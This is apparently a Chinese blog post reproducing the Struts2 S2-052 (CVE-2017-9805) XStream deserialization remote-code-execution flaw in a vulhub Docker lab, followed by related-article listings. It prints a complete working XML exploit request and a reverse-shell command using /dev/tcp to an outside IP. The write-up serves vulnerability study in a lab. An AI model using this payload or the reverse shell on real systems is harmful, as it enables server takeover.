Struts2-052 漏洞复现

最新推荐文章于 2023-04-02 00:00:25 发布
置顶 最新推荐文章于 2023-04-02 00:00:25 发布
阅读量776 收藏 1
点赞数
分类专栏: 漏洞学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/109091898
版权

 

前言

struts2应用已是千疮百孔, 最近突发奇想想研究一下相关原理和利用情况。s2-052漏洞由lgtm.com的安全研究员汇报,编号为CVE-2017-9805,是一个远程命令执行漏洞,漏洞危害程度为高危(Critical)。当用户使用带有 XStream 程序的 Struts REST 插件来处理 XML payloads 时,可能会遭到远程代码执行攻击。

影响版本:Struts 2.5.12 版本,百度说还影响到 2.3.33 版本。

1.环境搭建

本次复现采用ubuntu系统,利用docker部署环境。以下来探讨以下在环境部署和过程中遇到的问题。

具体内容请查看以下连接,需要注意的是Linux的docker与docker-compose的不同。

https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md

请执行以下命令搭建靶场环境 

apt install git docker.io docker-compose

git clone https://github.com/vulhub/vulhub.git

cd vulhub/struts2/s2-052/

docker-compose build

docker-compose up -d

注意:

在执行最后一步时可能会报错:Failed to start docker.service: Unit docker.service is masked.

解决方法:

systemctl unmask docker.service

systemctl unmask docker.socket

systemctl start docker.service

2.s2-052复现 

根据第一步的操作检查环境是否成功部署,访问环境相关地址,如截图所示。

 利用BurpSiute工具将payload发射到目标服务器,详细的POST数据和需要注意的事项请看下面的代码块,

POST /orders HTTP/1.1
Host: 192.168.204.142:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml  # 数据包头需要添加这个字段
Content-Length: 2414
Cookie: JSESSIONID=CF855BF35B5C60451837EEC2B4830419
Connection: close
Upgrade-Insecure-Requests: 1

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>
<string>touch</string>   # 执行命令
<string>/tmp/s2-052test.txt</string> # 执行命令
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

 http包头信息

        将需要执行的命令添加到command字段

检查服务端结果

 3.POC研究

在实验期间尝试执行其他命令,但好像该漏洞没有回显,在进一步深入后发现在执行的命令标签不能随意填写。

                       <command>
<string>touch</string>
<string>/tmp/s2-052test.txt</string>
                       </command>

尝试执行命令反弹shell。

<string>bash</string>
<string>-c</string>
<string>bash -i >&amp;/dev/tcp/192.168.204.135/10101 0>&amp;1</string>

参考连接:https://www.freebuf.com/vuls/147017.html

Jietewang
关注
专栏目录
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
Struts2 s2-052 REST插件远程代码执行技术分析与防护方案
zzkk_的博客
09-07 1615
2017年9月5日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x以及之前的部分2.x版本的REST插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有任何类型过滤导致远程代码执行。 相关地址: https://struts.apa
S2-052Struts2远程命令执行漏洞(CVE-2017-9805)
Unitue_逆流
10-13 6028
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Apache Struts2S2-052)远程代码执行漏洞利用和修复建议
蚁景网安学院
09-06 3452
点击“合天智汇”关注,学习网安干货话说哥们正吃着火锅唱着歌呢~~突然瞥见微信群的信息“Struts2 S2-052 RCE。。。。”赶紧放下筷子瞅一眼,这Struts2真是不让人省心啊,...
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
weixin_33736649的博客
09-06 349
一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 二. 漏洞基本信息...
[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)
00勇士王子的博客
07-14 2303
漏洞介绍 名称: struts2-052 远程代码执行 (CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2072
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
Struts2漏洞利用工具2017版
02-06
Struts2漏洞利用工具2017版,包含s2-032、037、019、016、045、046
复现S2远程代码执行漏洞
m0_71326960的博客
04-02 598
2.进入s2-052,执行docker-compose up -d命令(此处注意端口被占用会出现下载镜像报错,只需要把正在运行的镜像停止进程)6.说明利用成功,会在docker容器内创建文件/tmp/success,执行docker exec -it 容器id bash。点击send发送数据,出现状态码为200,和vulhub出计算结果后,即漏洞复现成功。3.随便上传一个文件,使用burpsuite进行抓包。1.使用docker搭建漏洞环境,进入目标文件夹。1.使用docker搭建漏洞环境。
docker复现s2-052远程代码执行漏洞
网安小白的博客
03-29 298
使用docker搭建s2-052远程代码执行漏洞(详细~)
java字符串大小写转换
yuekangwei的博客
08-23 974
import static jdk.nashorn.internal.objects.NativeString.toLowerCase; import static jdk.nashorn.internal.objects.NativeString.toUpperCase; /** * 该代码展示字符串大小写 */ public class test { public static void main(String[] args) { //方法一: System.o
[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞
公众号shadow sock7
12-15 3396
漏洞详情 CVE-2020-26259: 任意文件删除。 CVE-2020-26258: SSRF 细节 poc [CVE-2020-26258] SSRF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.run
Struts S2-052 漏洞复现
时光凉春衫薄的博客
07-23 1658
最近研究了一下docker 发现这个东西真的是快 漏洞环境许多地方都有现成的省的自己去搭建环境了。可以说真的是便利啊。 这两天又在研究struts2 下了环境做个试验玩玩 通过 docker pull medicean/vulapps:s_struts2_s2-052 下载这个漏洞的环境 查看本地的镜像 将这个镜像运行起来 我将docker的业务端口映射到本机的80端口上 ...
Web框架漏洞--Struts2 漏洞S2-052
qq_54713392的博客
05-08 901
Web框架漏洞Struts2 漏洞S2-052 漏洞利用: Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-052
s2 安恒 漏洞验证工具_Struts2 部分漏洞复现
weixin_39945679的博客
01-02 1033
s2-061已经复现过了,低版本漏洞可以使用k8哥哥和安恒的工具完成检测和写马,就不再做复现了,当然也可以使用漏扫去发现漏洞s2-059漏洞描述:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。影响版本:Struts 2.0.0 – Struts 2.5.2...
s2-005漏洞复现
最新发布
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为...关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值